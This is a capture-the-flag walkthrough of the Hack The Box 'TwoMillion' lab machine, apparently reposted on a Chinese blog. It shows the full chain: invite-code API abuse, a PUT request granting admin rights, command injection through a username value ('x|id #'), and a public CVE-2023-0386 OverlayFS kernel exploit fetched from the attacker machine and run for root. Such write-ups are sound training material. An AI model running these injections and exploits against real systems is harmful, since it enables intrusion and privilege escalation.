Information Gathering
| IP Address | Opening Ports |
|---|---|
| 10.10.11.221 | TCP:22,80 |
$ sudo masscan -p1-65535,U:1-65535 10.10.11.221 --rate=1000 -p1-65535,U:1-65535 -e tun0 > /tmp/ports$ ports=$(cat /tmp/ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')$ nmap -Pn -sV -sC -p$ports 10.10.11.221
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open http nginx
|_http-title: Did not follow redirect to http://2million.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
JS Code Deobfuscation && Unauthorized API Access RCE
# echo '10.10.11.221 2million.htb'>>/etc/hosts
![[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图](https://img.4awl.net/img/b3/21bf64d13686acaa688d280150a0b6.jpg "[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图")
$ dirsearch -u http://2million.htb
![[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图1](https://img.4awl.net/img/15/1a4d7b0df011733cd0f2b2f64c1a46.jpg "[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图1")
![[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图2](https://img.4awl.net/img/1f/e9250b718142d7a9fe7b727897fd95.jpg "[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图2")
view-source:http://2million.htb/js/inviteapi.min.js
![[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图3](https://img.4awl.net/img/c3/7080261d3bc117dde8b5b07611e186.jpg "[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图3")
JavaScript 混淆代码解析
![[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图4](https://img.4awl.net/img/e7/f52cc05bad4b6c792395ee1e121a59.jpg "[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图4")
function verifyInviteCode(code) {
var formData = { "code": code };
$.ajax({
type: "POST",
dataType: "json",
data: formData,
url: '/api/v1/invite/verify',
success: function(response) {
console.log(response);
},
error: function(response) {
console.log(response);
}
});
}
function makeInviteCode() {
$.ajax({
type: "POST",
dataType: "json",
url: '/api/v1/invite/generate',
success: function(response) {
console.log(response);
},
error: function(response) {
console.log(response);
}
});
}
![[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图5](https://img.4awl.net/img/90/0eb17130616c7df132b1691b738680.jpg "[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图5")
$ echo 'Va beqre gb trarengr gur vaivgr pbqr, znxr n CBFG erdhrfg gb /ncv/i1/vaivgr/trarengr'|tr 'A-Za-z' 'N-ZA-Mn-za-m'
![[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图6](https://img.4awl.net/img/e5/80895b5c16ff6391669e7c394cee56.jpg "[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图6")
POST /api/v1/invite/generate HTTP/1.1
Host: 2million.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=11hkqh03a638kn4bsphv86bqr2
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
![[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图7](https://img.4awl.net/img/53/d7716beba2131d65904f5a8206fa34.jpg "[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图7")
DATV8-W1GS1-U5MY1-E43OY
![[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图8](https://img.4awl.net/img/14/3310f237aad0b3ee043c50be2c45a9.jpg "[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图8")
http://2million.htb/home
![[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图9](https://img.4awl.net/img/28/6ddc57b5564bc1135674594a70fbbd.jpg "[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图9")
![[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图10](https://img.4awl.net/img/2b/7c2dfaa77d5c9c62349c42da318f1d.jpg "[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图10")
用户 API
| 请求方式 | 路由 | 说明 |
|---|---|---|
| GET | /api/v1 |
路由列表 |
| GET | /api/v1/invite/how/to/generate |
邀邀请码生成说明 |
| GET | /api/v1/invite/generate |
生成邀请码 |
| GET | /api/v1/invite/verify |
验证邀请码 |
| GET | /api/v1/user/auth |
检查用户是否已认证 |
| GET | /api/v1/user/vpn/generate |
生成新的 VPN 配置 |
| GET | /api/v1/user/vpn/regenerate |
重新生成 VPN 配置 |
| GET | /api/v1/user/vpn/download |
下载 OVPN 文件 |
| POST | /api/v1/user/register |
注册新用户 |
| POST | /api/v1/user/login |
登录已有用户 |
管理员 API
| 请求方式 | 路由 | 说明 |
|---|---|---|
| GET | /api/v1/admin/auth |
检查用户是否为管理员 |
| POST | /api/v1/admin/vpn/generate |
为特定用户生成 VPN |
| PUT | /api/v1/admin/settings/update |
更新用户设置 |
GET /api/v1/user/vpn/download HTTP/1.1
openvpn配置文件
![[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图11](https://img.4awl.net/img/68/94f25b3f8671993a5fe6d8acf88a05.jpg "[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图11")
查看权限
![[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图12](https://img.4awl.net/img/6d/267aede4e1289f3ac85451d8bb1324.jpg "[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图12")
升级管理员
![[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图13](https://img.4awl.net/img/c6/7ea04d95fa04e52cc9280112308ffb.jpg "[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图13")
![[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图14](https://img.4awl.net/img/5e/4c1d2149fd7762d0e18b7ec9ef575d.jpg "[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图14")
![[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图15](https://img.4awl.net/img/37/87786c5bbb816e93e3740d768150de.jpg "[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图15")
PUT /api/v1/admin/settings/update HTTP/1.1
Host: 2million.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Referer: http://2million.htb/home/rules
Connection: close
Cookie: PHPSESSID=11hkqh03a638kn4bsphv86bqr2
Upgrade-Insecure-Requests: 1
Content-Length: 47
{
"email":"[email protected]",
"is_admin":1
}
![[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图16](https://img.4awl.net/img/a3/0cc95871f3330e4203ff17aa348d13.jpg "[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图16")
![[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图17](https://img.4awl.net/img/00/714b654e56d70fa931c4314703b67a.jpg "[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图17")
POST /api/v1/admin/vpn/generate HTTP/1.1
Host: 2million.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Referer: http://2million.htb/home/rules
Connection: close
Cookie: PHPSESSID=11hkqh03a638kn4bsphv86bqr2
Upgrade-Insecure-Requests: 1
Content-Length: 35
{
"username":"[email protected]"
}
![[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图18](https://img.4awl.net/img/b5/43a9d0f4f8c87d1ab555ff8655f8d0.jpg "[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图18")
{
"username":"x|id #"
}
![[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图19](https://img.4awl.net/img/a5/0fa39e8584693c66433ce2ae316cd0.jpg "[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图19")
![[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图20](https://img.4awl.net/img/1e/c2982d35e731003d249c3c61404eb1.jpg "[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图20")
![[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图21](https://img.4awl.net/img/d6/16946841e3243dc3cb08789dc95df3.jpg "[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图21")
username:adminpassword:SuperDuperPass123
$ ssh [email protected]
![[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图22](https://img.4awl.net/img/b1/31863a9bc32ce4c11bf9f60720daf3.jpg "[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图22")
User.txt
6a9c99994e4334df9edc1fc13bca997b
Privilege Escalation:OverlayFS
在/var/spool/mail/admin有一封邮件
From: ch4p <[email protected]>
To: admin <[email protected]>
Cc: g0blin <[email protected]>
Subject: Urgent: Patch System OS
Date: Tue, 1 June 2023 10:45:22 -0700
Message-ID: <[email protected]>
X-Mailer: ThunderMail Pro 5.2
Hey admin,
I'm know you're working as fast as you can to do the DB migration. While we're partially down, can you also upgrade the OS on our web host? There have been a few serious Linux kernel CVEs already this year. That one in OverlayFS / FUSE looks nasty. We can't get popped by that.
HTB Godfather
提到了 OverlayFS / FUSE 漏洞
![[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图23](https://img.4awl.net/img/1f/e262c6496191557093eb1ae1fed162.jpg "[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图23")
$ git clone https://github.com/puckiestyle/CVE-2023-0386.git
$ tar -czvf CVE-2023-0386.tar.gz ./CVE-2023-0386
admin@2million:/tmp$ wget http://10.10.16.16/CVE-2023-0386.tar.gz
admin@2million:/tmp$ tar -zxvf CVE-2023-0386.tar.gz
admin@2million:/tmp/CVE-2023-0386$ make all
admin@2million:/tmp/CVE-2023-0386$ ./fuse ./ovlcap/lower ./gc
admin@2million:/tmp/CVE-2023-0386$ ./exp
![[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图24](https://img.4awl.net/img/84/799bd933e16361d5b5f669e46e73ca.jpg "[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升插图24")
Root.txt
35ed55b48c40b4a093970f40eda0281c
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)
